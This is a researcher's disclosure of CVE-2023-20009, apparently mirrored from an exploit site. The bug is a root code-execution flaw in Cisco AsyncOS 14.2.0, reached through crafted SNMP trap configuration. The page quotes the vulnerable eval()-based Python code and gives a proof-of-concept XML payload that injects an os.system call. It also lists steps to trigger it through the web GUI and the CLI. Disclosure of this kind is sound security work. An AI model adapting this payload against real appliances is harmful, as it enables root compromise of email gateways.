Share
## https://sploitus.com/exploit?id=5F88448A-DD17-5D44-ADF8-D5AF5D256740
# About

Security researcher: ly1g3, ly1g3[at]tuta.io 

GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Overview: Remote Code Execution - RCE from config file

CVE: CVE-2023-20009

Timeline:
* Discovered - ly1g3
* Reported - ly1g3
* Fixed - Cisco

# Cisco AsyncOS 14.2.0
ESA (Cisco Secure Email) and Cisco Secure Email and Web Manager

## Privilege escalation - root shell
A authenticated user with permissions to SNMP-config can execute arbitrary code as root using a specially crafted SNMP trap config.

## Technical
Code exploited `ui_checker.py`:
```python
def validate_trap_configuration(base, value_dict):
    validators = eval('read_var_auto_level_wrapper("snmp.%s_traps.configuration_class", non_editable_var=True)' % (base,))
    for k, v in value_dict.iteritems():
        if validators.has_key(k):
            base, conf_class_str = validators[k].rsplit('.', 1)
            module = __import__(base, fromlist=[conf_class_str])
            conf_class = eval('module.%s("%s")' % (conf_class_str, v))
        else:
            raise FilterError('validate_%s_trap_configuration_value' % (base,),
                              _("Trap does not allow configuration"), k)
    return value_dict
```
`v` will be contain the value of `common_trap.common_configuration`

```xml

    connectivityFailure
    0
    http://asd.asd."+os.system("touch test.txt"))#,5
    

```

### Steps to trigger using WEB-GUI:
1. `https://192.168.1.10/system_administration/configuration_file`
2. "Load a configuration file from local computer"
3. Replace current `connectivityFailure` field with payload above

### Steps to trigger using CLI
1. `loadconfig`
2. Paste payload